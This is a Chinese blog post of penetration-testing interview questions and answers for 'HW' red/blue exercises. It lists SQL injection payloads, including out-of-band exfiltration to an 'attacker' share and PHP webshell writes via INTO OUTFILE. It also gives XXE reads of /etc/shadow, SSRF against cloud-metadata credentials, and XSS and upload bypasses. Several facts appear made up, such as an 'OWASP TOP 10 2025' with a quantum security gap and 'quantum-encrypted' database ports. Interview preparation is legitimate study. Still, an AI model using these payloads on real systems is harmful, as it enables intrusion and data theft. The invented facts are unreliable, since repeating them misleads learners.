2025年渗透测试面试题总结-2025年HW(护网面试) 08(题目+回答)

安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。

目录

 2025年HW(护网面试) 08

一、渗透测试六步流程

二、WAF绕过五大技法

三、SQL注入经典Payload

四、XSS攻防体系

五、XXE漏洞原理

六、OWASP TOP 10 2025

七、SQL注入关键函数

八、XSS与CSRF的本质区别

九、中间件漏洞热榜

十、文件上传绕过技术

十一、反序列化漏洞原理

十二、预处理突破方法

十三、HttpOnly防御机制

十四、SQL注入GetShell路径

十五、数据库默认端口

十六、SSRF漏洞升级攻击

十七、Web安全漏洞TOP8

十八、MySQL注入版本差异

十九、GET与POST传参对比

 2025年HW(护网面试) 08

1、渗透测试简要流程
2、绕过WAF常用方法
3、SQL注入常见Payload
4、XSS种类、弹窗函数、绕过方法
5、XXE漏洞原理
6、列举OWASP TOP10
7、SQL注入常用函数
8、.XSS和CSRF的区别
9、常见的中间件
10、文件上传怎么绕过
11、反序列化的原理
12、数据库预处理怎么突破
13、httponly
14、SQL注入如何拿GetShel
15、oracle、mysql、sqlserver默认端口
16、SSRF
17、常见Web安全漏洞
18、MYSQL注入5.0以上和5.0以下有什么区别
19、get传参和post传参的区别

一、渗透测试六步流程

mermaidgraph LR A[信息收集] --> B[漏洞扫描] B --> C[漏洞利用] C --> D[权限提升] D --> E[横向移动] E --> F[痕迹清理]
  1. 信息收集
    • 子域名爆破(Amass)
    • 端口服务扫描(Nmap深度指纹识别)
  2. 漏洞利用
    • 优先使用无文件攻击降低WAF检测率
  3. 痕迹清理
    • 使用MemfDump清除内存痕迹

二、WAF绕过五大技法

类型方法实例2025年有效性
混淆绕过<img/src=1 onerror=alert(1)>★★★★☆
协议层绕过HTTP分块传输+畸形报文★★★★★
编码绕过㊙️→UTF-7→+AGYAbwBy-★★★☆☆
资源限制绕过低频慢速攻击(1req/5min)★★★★☆
规则盲区利用云WAF未覆盖的API网关路径★★★★★

三、SQL注入经典Payload

爆破类

sql' OR 1=1-- UNION SELECT @@version,LOAD_FILE('/etc/passwd')#

时间盲注

sqlIF(SUBSTR(database(),1,1)='a',SLEEP(5),0)

带外攻击

sqlDECLARE @q VARCHAR(100)=\\attacker\$(SELECT TOP 1 column_name FROM information_schema.columns); EXEC xp_dirtree @q; --

四、XSS攻防体系

三大类型

  1. 反射型:URL参数未过滤直接输出
  2. 存储型:恶意脚本存入数据库(如评论区)
  3. DOM型:前端JS操作未消毒(eval(location.hash)

弹窗函数

javascriptalert(); prompt(); confirm(); // 基础 open(); print(); // 高级绕过 

绕过方法

  • Unicode混淆:\u0061lert()
  • HTML实体分割:<scr&#x69;pt>
  • 事件处理劫持:<svg/onload=alert>

五、XXE漏洞原理

攻击流程

mermaidsequenceDiagram 攻击者->>服务器: 发送恶意XML 服务器->>外部实体: 解析ENTITY引用 外部实体-->>服务器: 返回敏感文件内容 服务器->>攻击者: 在报错/响应中泄漏数据

利用场景

  • 读取服务器文件:<!ENTITY xxe SYSTEM "file:///etc/shadow">
  • SSRF攻击:<!ENTITY xxe SYSTEM "http://169.254.169.254/">

六、OWASP TOP 10 2025

  1. 注入漏洞(SQLi/NoSQLi)
  2. AI供应链攻击(第三方模型污染)
  3. 量子安全缺口(RSA算法脆弱性)
  4. 云配置错误(桶策略开放)
  5. 自动化漏洞(API未授权访问)
    → 完整TOP10见OWASP官网年度报告

七、SQL注入关键函数

数据库信息获取函数文件操作函数
MySQLdatabase()LOAD_FILE()
OracleSELECT banner FROM v$versionUTL_FILE.FOPEN()
SQL Server@@VERSIONxp_cmdshell

八、XSS与CSRF的本质区别

diff+ XSS:客户端脚本执行漏洞 - 目标:用户浏览器 - 效果:窃取会话/挂马 - CSRF:跨站请求伪造 - 目标:Web应用服务端 - 效果:以用户身份执行操作(如转账)

九、中间件漏洞热榜

  1. Nginx
    • CVE-2025-1100 路径遍历(已修补)
  2. Apache
    • ModSecurity规则绕过(通配符.*失效)
  3. IIS
    • 短文件名暴力枚举(2025年仍存在)

十、文件上传绕过技术

三层绕过矩阵

防御层绕过方法
前端校验Burp修改Content-Type为image/png
后端校验添加PNG文件头+PHP恶意代码
执行拦截.htaccess设置解析规则(AddType application/x-httpd-php .test

十一、反序列化漏洞原理

攻击链
用户输入 → 未过滤反序列化 → 触发类魔法方法(__wakeup/destruct)→ RCE
高危库

  • Java:Apache Commons Collections
  • Python:Pickle模块
  • PHP:unserialize() + Phar协议

十二、预处理突破方法

  1. 二次注入
    • 先存入恶意数据 → 后触发查询
  2. 预编译逃逸
    • MySQL的\转义符绕过(CVE-2024-22205)
  3. 非文本列注入
    • JSON/XML字段未预处理

十三、HttpOnly防御机制

httpSet-Cookie: SESSION=abcd1234; HttpOnly; Secure; SameSite=Strict
  • ✅ 阻止document.cookie 读取
  • ✅ 抵御90%的XSS窃Cookie攻击
  • ❌ 无法防护CSRF(需配合Token)

十四、SQL注入GetShell路径

  1. 写文件
sqlSELECT '<?php system($_GET[0]); ?>' INTO OUTFILE '/var/www/shell.php' 
  1. 日志篡改
sqlSET global general_log_file='/var/www/shell.php'; 
  1. 插件利用
sqlCREATE UDF 'sys_exec' RETURNS INT SONAME 'udf.so'; 

十五、数据库默认端口

数据库默认端口加密端口(2025标准)
MySQL330633060(TLS 1.3)
Oracle15212484(量子加密)
SQL Server143314333(AES-256)

十六、SSRF漏洞升级攻击

新型利用方式

  1. 云元数据攻击
    http://169.254.169.254/latest/meta-data/iam/security-credentials/
  2. 穿透防火墙
    利用gopher协议发送内网Redis命令
  3. DNS重绑定
    5秒TTL切换域名解析到内网IP

十七、Web安全漏洞TOP8

  1. 注入漏洞(SQL/OS/NoSQL)
  2. 认证失效(JWT密钥硬编码)
  3. 敏感数据泄露(GitHub令牌残留)
  4. XXE(XML解析器配置错误)
  5. 访问控制缺失(水平越权)
  6. 安全配置错误(K8s RBAC配置)
  7. CSRF(敏感操作无Token)
  8. 老旧组件(Log4j 2.x未更新)

十八、MySQL注入版本差异

特性5.0以下5.0以上
数据库名获取暴力猜解information_schema
联合查询列数手动探测ORDER BY直接判断
报错信息基础错误详细泄露路径
文件读写权限默认禁用secure_file_priv控制

十九、GET与POST传参对比

properties# GET请求 method = "GET" 参数位置 = URL可见 缓存机制 = 浏览器主动缓存 长度限制 = 2048字符(RFC标准) # POST请求 method = "POST" 参数位置 = Body隐藏 安全场景 = 密码/文件上传 长度限制 = 理论无上限(服务器约束)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值